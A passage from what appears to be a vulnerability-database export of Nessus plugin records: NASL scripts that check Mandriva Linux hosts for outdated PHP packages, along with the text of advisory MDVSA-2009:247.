script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64php5_common5-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libphp5_common5-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-bcmath-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-bz2-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-calendar-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-cgi-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-cli-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-ctype-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-curl-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-dba-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-dbase-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-devel-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-dom-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-exif-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-fcgi-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-filter-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-ftp-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-gd-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-gettext-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-gmp-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-hash-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-iconv-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-imap-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-ini-5.2.4-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-json-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-ldap-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-mbstring-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-mcrypt-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-mhash-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-mime_magic-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-ming-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-mssql-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-mysql-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-mysqli-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-ncurses-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-odbc-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-openssl-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-pcntl-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-pdo-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-pdo_dblib-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-pdo_mysql-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-pdo_odbc-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-pdo_pgsql-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-pdo_sqlite-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-pgsql-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-posix-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-pspell-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-readline-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-recode-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-session-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-shmop-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-simplexml-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-snmp-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-soap-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-sockets-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-sqlite-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-suhosin-0.9.22-1.1mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-sysvmsg-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-sysvsem-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-sysvshm-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-tidy-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-tokenizer-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-wddx-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-xml-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-xmlreader-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-xmlrpc-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-xmlwriter-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-xsl-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"php-zlib-5.2.4-3.6mdv2008.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:52:19", "description": "Multiple vulnerabilities was discovered and corrected in php :\n\nThe dba_replace function in PHP 5.2.6 and 4.x allows context-dependent\nattackers to cause a denial of service (file truncation) via a key\nwith the NULL byte. NOTE: this might only be a vulnerability in\nlimited circumstances in which the attacker can modify or add database\nentries but does not have permissions to truncate the file\n(CVE-2008-7068).\n\nThe php_openssl_apply_verification_policy function in PHP before\n5.2.11 does not properly perform certificate validation, which has\nunknown impact and attack vectors, probably related to an ability to\nspoof certificates (CVE-2009-3291).\n\nUnspecified vulnerability in PHP before 5.2.11 has unknown impact and\nattack vectors related to missing sanity checks around exif\nprocessing. (CVE-2009-3292)\n\nUnspecified vulnerability in the imagecolortransparent function in PHP\nbefore 5.2.11 has unknown impact and attack vectors related to an\nincorrect sanity check for the color index. (CVE-2009-3293). However\nin Mandriva we don't use the bundled libgd source in php per default,\nthere is a unsupported package in contrib named php-gd-bundled that\neventually will get updated to pickup these fixes.\n\nThis update provides a solution to these vulnerabilities.", "edition": 25, "published": "2009-09-28T00:00:00", "title": "Mandriva Linux Security Advisory : php (MDVSA-2009:247)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3292", "CVE-2008-7068", "CVE-2009-3291", "CVE-2009-3293"], "modified": "2009-09-28T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:php-xmlwriter", "p-cpe:/a:mandriva:linux:php-fcgi", "p-cpe:/a:mandriva:linux:php-json", "p-cpe:/a:mandriva:linux:php-bcmath", "p-cpe:/a:mandriva:linux:php-gd", "p-cpe:/a:mandriva:linux:php-pdo", "p-cpe:/a:mandriva:linux:php-calendar", "p-cpe:/a:mandriva:linux:php-mbstring", "p-cpe:/a:mandriva:linux:php-mhash", "p-cpe:/a:mandriva:linux:php-sysvmsg", "p-cpe:/a:mandriva:linux:php-ming", "p-cpe:/a:mandriva:linux:php-posix", "p-cpe:/a:mandriva:linux:php-cgi", "p-cpe:/a:mandriva:linux:php-pcntl", "p-cpe:/a:mandriva:linux:php-hash", "p-cpe:/a:mandriva:linux:php-zlib", "p-cpe:/a:mandriva:linux:php-openssl", "p-cpe:/a:mandriva:linux:php-soap", "p-cpe:/a:mandriva:linux:php-xml", "p-cpe:/a:mandriva:linux:php-ftp", "p-cpe:/a:mandriva:linux:php-dom", "p-cpe:/a:mandriva:linux:php-curl", "p-cpe:/a:mandriva:linux:php-sysvsem", "p-cpe:/a:mandriva:linux:php-ctype", "cpe:/o:mandriva:linux:2009.0", "p-cpe:/a:mandriva:linux:php-sockets", "p-cpe:/a:mandriva:linux:php-gmp", "p-cpe:/a:mandriva:linux:php-sysvshm", "p-cpe:/a:mandriva:linux:php-dbase", "p-cpe:/a:mandriva:linux:php-pdo_pgsql", "p-cpe:/a:mandriva:linux:php-pdo_mysql", "p-cpe:/a:mandriva:linux:php-xmlrpc", "p-cpe:/a:mandriva:linux:php-bz2", "cpe:/o:mandriva:linux:2008.1", "p-cpe:/a:mandriva:linux:php-ldap", "p-cpe:/a:mandriva:linux:php-xsl", "p-cpe:/a:mandriva:linux:php-tidy", "p-cpe:/a:mandriva:linux:lib64php5_common5", "p-cpe:/a:mandriva:linux:php-ncurses", "p-cpe:/a:mandriva:linux:php-xmlreader", "p-cpe:/a:mandriva:linux:php-cli", "p-cpe:/a:mandriva:linux:php-mssql", "p-cpe:/a:mandriva:linux:php-sqlite", "p-cpe:/a:mandriva:linux:php-session", "p-cpe:/a:mandriva:linux:php-readline", "p-cpe:/a:mandriva:linux:php-pdo_sqlite", "p-cpe:/a:mandriva:linux:libphp5_common5", "p-cpe:/a:mandriva:linux:php-tokenizer", "p-cpe:/a:mandriva:linux:php-pgsql", "p-cpe:/a:mandriva:linux:php-recode", "p-cpe:/a:mandriva:linux:php-gettext", "p-cpe:/a:mandriva:linux:php-imap", "p-cpe:/a:mandriva:linux:php-iconv", "p-cpe:/a:mandriva:linux:php-devel", "p-cpe:/a:mandriva:linux:php-pdo_dblib", "p-cpe:/a:mandriva:linux:php-exif", "p-cpe:/a:mandriva:linux:php-odbc", "p-cpe:/a:mandriva:linux:php-pdo_odbc", "p-cpe:/a:mandriva:linux:php-snmp", "p-cpe:/a:mandriva:linux:php-mysql", "p-cpe:/a:mandriva:linux:php-pspell", "p-cpe:/a:mandriva:linux:php-mime_magic", "p-cpe:/a:mandriva:linux:php-filter", "p-cpe:/a:mandriva:linux:php-sybase", "p-cpe:/a:mandriva:linux:php-wddx", "p-cpe:/a:mandriva:linux:php-dba", "p-cpe:/a:mandriva:linux:php-mcrypt", "p-cpe:/a:mandriva:linux:php-shmop", "p-cpe:/a:mandriva:linux:php-mysqli"], "id": "MANDRIVA_MDVSA-2009-247.NASL", "href": "https://www.tenable.com/plugins/nessus/41639", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:247. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41639);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-7068\", \"CVE-2009-3291\", \"CVE-2009-3292\", \"CVE-2009-3293\");\n script_bugtraq_id(36449);\n script_xref(name:\"MDVSA\", value:\"2009:247\");\n\n script_name(english:\"Mandriva Linux Security Advisory : php (MDVSA-2009:247)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities was discovered and corrected in php :\n\nThe dba_replace function in PHP 5.2.6 and 4.x allows context-dependent\nattackers to cause a denial of service (file truncation) via a key\nwith the NULL byte. NOTE: this might only be a vulnerability in\nlimited circumstances in which the attacker can modify or add database\nentries but does not have permissions to truncate the file\n(CVE-2008-7068).\n\nThe php_openssl_apply_verification_policy function in PHP before\n5.2.11 does not properly perform certificate validation, which has\nunknown impact and attack vectors, probably related to an ability to\nspoof certificates (CVE-2009-3291).\n\nUnspecified vulnerability in PHP before 5.2.11 has unknown impact and\nattack vectors related to missing sanity checks around exif\nprocessing. (CVE-2009-3292)\n\nUnspecified vulnerability in the imagecolortransparent function in PHP\nbefore 5.2.11 has unknown impact and attack vectors related to an\nincorrect sanity check for the color index. (CVE-2009-3293). However\nin Mandriva we don't use the bundled libgd source in php per default,\nthere is a unsupported package in contrib named php-gd-bundled that\neventually will get updated to pickup these fixes.\n\nThis update provides a solution to these vulnerabilities.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dbase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-filter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mhash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mime_magic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mysqli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_dblib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sybase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64php5_common5-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libphp5_common5-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-bcmath-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-bz2-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-calendar-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-cgi-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-cli-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-ctype-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-curl-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-dba-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-dbase-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-devel-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-dom-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-exif-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-fcgi-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-filter-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-ftp-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-gd-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-gettext-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-gmp-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-hash-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-iconv-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-imap-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-json-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-ldap-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", reference:\"php-mbstring-5.2.5-14.7mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", 